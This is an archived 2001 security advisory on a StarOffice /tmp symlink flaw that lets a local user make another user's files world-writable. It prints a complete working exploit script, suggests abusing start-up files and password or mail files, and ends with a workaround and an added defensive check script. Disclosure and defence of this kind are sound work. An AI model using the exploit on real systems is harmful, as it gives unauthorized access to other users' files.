HeliSec: StarOffice symlink exploit

2001-02-20T00:00:00
ID SECURITYVULNS:DOC:1299
Type securityvulns
Reporter Securityvulns
Modified 2001-02-20T00:00:00

Description

    - = Helios Security and Administration = -

    Hi everyone,

    StarOffice creates a temporary directory in /tmp called soffice.tmp, with permissions 0777. Other temporary files are created in this directory, with names of the form svZZZZ.tmp, where ZZZZ is a four- or five-digit number.

    StarOffice not only creates the /tmp/soffice.tmp directory with permissions 0777, but also sometimes chmod()s it again afterwards while StarOffice is running. If any user creates a symbolic link from /tmp/soffice.tmp to any file owned by another user, then when that other user runs StarOffice the target of the link will become 0777. So, if the directory of the target file is accessible to the malicious user who created the symlink, he can do whatever he wants with the file. A few ways to exploit this are:

    - to modify shell start-up files (such as .profile, .bashrc, .cshrc, etc.) to execute whatever the hacker wants the next time the victim logs in.
    - to gain access to private files with sensitive information, such as password files, mail spool files, etc.
    - a lot more evil acts.

    StarOffice gives no error message or the like when it changes the permissions of the target file, so from the victim's point of view all is going right ;-)

    Requirements:

    - Access to the target file's directory is needed.
    - The target file must NOT be executable.

    Fix:

    One way to fix the problem is to create a directory called tmp inside your home directory which is inaccessible to anyone but yourself (permissions 700). Then insert an entry in your login start-up file to set the $TMP environment variable to $HOME/tmp, so it will direct StarOffice to use your temporary directory rather than the system /tmp. Something like this (in bash):

    [wushu@JeT-Li]$ TMP=$HOME/tmp ; export TMP
    (not permanent)

    or modify .bash_profile, adding TMP=$HOME/tmp and including this variable in the export.

    Here is the exploit code. To make sure that this will work, first run StarOffice so that you become the owner of /tmp/soffice.tmp, which is necessary to remove it and create the symlink.

    #!/bin/sh

    SOFFICE="/tmp/soffice.tmp"
    TARGETFILE=$1

    if [ $# != 1 ]; then
        echo
        echo " - = HeliSec - Helios Security and Administration = -"
        echo "Usage : "
        echo "./soffice.sh <file>"
        echo "Set 0777 permissions to any file (access to the directory of the file needed)"
        echo " JeT Li -The Wushu Master-"
        exit
    fi

    if [ ! -f ${TARGETFILE} ]; then
        echo "Target file must exist"
        exit
    fi

    rm -rf ${SOFFICE}
    ln -sn ${TARGETFILE} ${SOFFICE}
    echo
    echo "Symbolik link done ..."
    echo

    perl -e '$a=`ps aux | grep office`; $a =~ /soffice\.bin/ ? print "StarOffice is running on this machine ... wait a minutes and the permissions will have been set.\n" : print "StarOffice is not running on this machine ...you may wait for the signal (not recommended) or CTRL+C the program; when the user run StarOffice the permissions will be set automaticly\n";'

    while :
    do
        if [ `ls -al ${TARGETFILE} | awk '{printf $1}'` = "-rwxrwxrwx" ]; then
            echo
            echo "Permissions set succesfully ... good luck ;-)"
            echo
            echo "- = HeliSec - Helios Security and Administration = -"
            echo " JeT Li -The Wushu Master-"
            exit
        fi
    done

    Cheers,

                                    JeT Li  -The Wushu Master-
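
A defensive check for the condition this advisory describes, combined with the private-TMP workaround from its Fix section. This is an added example, not part of the original advisory; the function names check_soffice_tmp and use_private_tmp are made up for illustration.

```shell
#!/bin/sh
# Added example, not from the advisory. The path /tmp/soffice.tmp and the
# $HOME/tmp fix come from the advisory; the function names are hypothetical.

# check_soffice_tmp DIR
# Returns 0 if DIR is absent or is a non-world-writable directory owned by
# the caller; returns 1 if it is a symlink, foreign-owned, or world-writable.
check_soffice_tmp() {
    cst_dir=$1
    # -L tests the link itself, so a planted symlink is reported before any
    # other test gets a chance to follow it to its target.
    if [ -L "$cst_dir" ]; then
        echo "RISK: symlink: $(ls -ld "$cst_dir")"
        return 1
    fi
    if [ ! -e "$cst_dir" ]; then
        echo "OK: $cst_dir does not exist"
        return 0
    fi
    # ls -ldn: field 1 is the mode string, field 3 the numeric owner.
    cst_info=$(ls -ldn "$cst_dir" | awk '{print $1, $3}')
    cst_mode=${cst_info% *}
    cst_uid=${cst_info#* }
    cst_rc=0
    if [ "$cst_uid" != "$(id -u)" ]; then
        echo "RISK: $cst_dir is owned by uid $cst_uid"
        cst_rc=1
    fi
    # The ninth character of the mode string is the "other" write bit.
    case $cst_mode in
        ????????w*) echo "RISK: $cst_dir is world-writable ($cst_mode)"; cst_rc=1 ;;
    esac
    if [ "$cst_rc" -eq 0 ]; then echo "OK: $cst_dir ($cst_mode)"; fi
    return "$cst_rc"
}

# use_private_tmp: the advisory's workaround. Creates $HOME/tmp with mode 700
# and exports TMP so that programs started from this shell use it.
use_private_tmp() {
    mkdir -p "$HOME/tmp" && chmod 700 "$HOME/tmp" || return 1
    TMP=$HOME/tmp
    export TMP
}

# Audit the path the advisory names; report only, do not fail the script.
check_soffice_tmp /tmp/soffice.tmp || true
```

Run the check before starting StarOffice on a shared machine; a RISK line means the directory should be inspected before the application touches it.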
